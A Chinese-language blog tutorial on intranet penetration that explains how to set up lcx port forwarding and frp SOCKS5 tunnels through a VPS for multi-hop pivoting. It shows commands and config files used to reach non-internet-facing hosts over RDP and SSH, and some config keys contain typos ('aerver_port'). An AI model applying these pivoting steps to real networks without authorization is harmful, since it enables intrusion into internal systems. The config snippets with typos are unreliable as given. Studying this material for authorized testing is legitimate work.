内网渗透-隧道搭建

随笔2个月前发布 白开水也辣
23 0 0

一、前言

为什么要进行代理搭建?因为目标主机会把一些可利用的端口给禁了,或者说内网 的防火墙不允许这些端口出现,那么这时候就需要搭建一个隧道,什么是隧道,对于小白来说可能有点抽象,其实就是主机与攻击机之间的通讯端口,然后还会设计到端口转发或者是端口映射的问题。

端口转发一般发生在一个主机里面,将800端口的流量转到900,而端口映射一般是两个主机,比如访问A主机的800端口就相当于访问B主机的900端口。但对其并没有多大的区分。

这里介绍lcx 和frp的使用。其他不讲。

二、需要搭建代理的场景

根据场景的复杂度通常需要设置一级代代理、二级代理….如果目标无公网ip就得使用VPS

1.场景一

最简单的场景:

攻击机kali

内网:
web1: 10.10.10.13(内网地址) (192.168.8.x)外网地址
DC: 10.10.10.11(不出网)
cilent1: 10.10.10.14(内网地址,不出网)

从这可以看到我们如果想要拿下cilent1,可以通过web1主机去。因为kali又不能与cilent1通讯。所以需要搭建代理。

目标

端口转发:**比如我要控制web1的桌面,需要通过3389来控制,但是防火墙不让外部地址有3389,但是可以4444的话,那我就可以使用端口转发。使得kali访问web1的4444端口就相当于访问3389.。

**端口映射:**但是如果我想使用的是cilent的3389,那我可以将cilent的3389映射到web1的4444

1.1 使用lcx进行端口转发

web1执行:

lcx.exe -tran 4444 127.0.0.1 3389

攻击机执行

rdesktop 192.168.8.x:4444

1.2 使用lcx进行端口映射

web1执行:

lcx.exe -tran 4444 10.10.10.14 3389

攻击机执行

rdesktop 192.168.8.x:4444

2.场景二

但是如果web1没有外网地址(192.168.8.x),只有内网地址(10.10.10.13),但是出网,可以使用frp以及vps进行搭建隧道。

这种场景搭建一级代理。

假设vps的地址为 43.143.93.88

目标:

端口转发:我要控制web1的3389,但是我只能允许4444进入。那么就可以将4444的流量转发到3389。

想ssh登录进入cilent1

frp搭建一级代理思路。在vps和web1之间搭建一个隧道,搭建这个隧道的时候对于vps会涉及到两个端口。一个是默认的7000连接frp的端口,一个是用户自定义的隧道端口。新手可能会很容易搞混这两个端口。默认的7000端口我们不用在意,只管客户端设置的remote_port.

2.1 使用frp搭建一级代理

将Vps作为服务端。把frps上传,并设置frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7000

web1作为客户端,配置frpc.ini

[common]
server_addr = 43.143.93.88
aerver_port = 7000

[socks5]
remote_port = 4444 #vps与web1之间的隧道端口,所有流量都通过vps的4444端口到达web1的4444端口
plugin = socks5	#vps可作为一个socks5的代理服务器。

plugin是一个插件,赋值socks5,意思是可以建立socks5代理服务器。什么意思,就是可以把它当做一个中间服务器进行传输。当然你可以都加,plugin = socks5。

然后在kali上将数据包流量扔到隧道里面。kali自带proxychains,配置proxychains.conf设置代理服务器:

socks5 43.143.93.88 4444

再运行

proxychain rdesktop 10.10.10.13:3389
或者
proxychain ssh root@10.10.10.14

这个就是把这个数据包的流量扔到vps这个代理服务器上,端口是4444,然后这个流量就会到达目标主机进行解析。

3.场景三

假设现在有另外一个主机cilent2 内网地址是10.10.20.5,可以与client1连接。但是我想在攻击机上ssh连接client2.

那么现在就必须再搭条隧道进入cilent1与cilent2所在的网段;

{%asset_image 1.png %}

3.1 frp搭建二级代理

将vps与web1作为代理服务器

vps的frps配置不变

web1 配置

frpc.ini

[common]
server_addr = 43.143.93.88
aerver_port = 7000

[socks5]
type = tcp 
local_port = 10808 #将1080隧道接受到的流量转发到10808,要转发流量,使用tcp协议。所以type=tcp
remote_port = 1080
plugin = socks5

这样第一条隧道搭建完毕。

同时它也要作为一个代理服务器,那么配置frps.ini,能在web1与cilent1之间建立一个隧道.成为第二条隧道

[common]
bind_addr = 10.10.10.13
bind_port = 7000

cilent1配置

frpc.ini

[common]
server_addr = 10.10.10.13
aerver_port = 7000

[socks5]
type = tcp #为什么要type=tcp,因为在第一条隧道的时候,数据包是tcp协议转发到10808的。
remote_port = 10808
plugin = socks5

到此两条隧道搭建完毕。

kali攻击

kali 可以通过proxchains来实现将流量包转发到vps这个第一个代理服务器,然后就会传到cilent1。

proxychains.conf配置好之后,就可以运行下面命令连接cilent2

proxychains ssh root@10.10.20.9

三级代理一样的,把cilent2加个frps.

三、frp的其他使用补充

frp进行内网穿透的时候,还有其他配置,比如,搭好隧道之后,把流量转发到22端口,就可以连接内网的22,将流量转发到其他部署有网站的端口,就可以通过vps访问到内网网站。但是一定要注意type.想连接22,就走tcp,想web,就可以走tcp也可以http.只不过http还得布置域名。

frps服务端不变。

主要是客户端frpc.ini

[common]
server_ip = 43.143.93.88
server_port = 7000

[ssh]
type = tcp
local_port =22
remote_port = 1080

[web]
type = tcp
local_port =80 #或者其他站点端口
remote_port = 4444

上述配置就可以直接通过操作43.143.93.88的相应端口来达到相关服务,比如要连接这个客户端的ssh

ssh -p 1080 root@43.143.93.88

要访问这个客户端内网的网站,直接浏览器访问http://43.143.93.88:4444就能访问。

但是如果是配置了代理服务器,搞了隧道,也就是frpc.ini的配置如下

[common]
server_ip = 43.143.93.88
server_port = 7000

[ssh]
remote_port = 1080
plugin = socks5

没有type = tcp 就不能访问。就算你配置了local_port = 22 或者88,都不能成功转发流量,也就是说,要进行端口转发流量必须加上type。

如果没加,就像上面一样,那么就是只搭建了一个代理服务器。

通过代理插件来实现。代理插件kali有proxychain,相关操作也有。代理插件或者软件的作用就是将数据包流量发送到代理服务器。

kali 直接配置文件,使用时就在命令前加上proxychain .

Windows可以使用proxifier。在设置代理服务器的时候,就可以设置 43.143.93.88 1080

再设置相应的规则就可以将流量经过代理服务器。

__EOF__

内网渗透-隧道搭建
本文作者: Traveler 本文链接: https://www.cnblogs.com/iruan/p/18214391 关于博主: 评论和私信会在第一时间回复。或者直接私信我。 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处! 声援博主: 如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。

© 版权声明

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...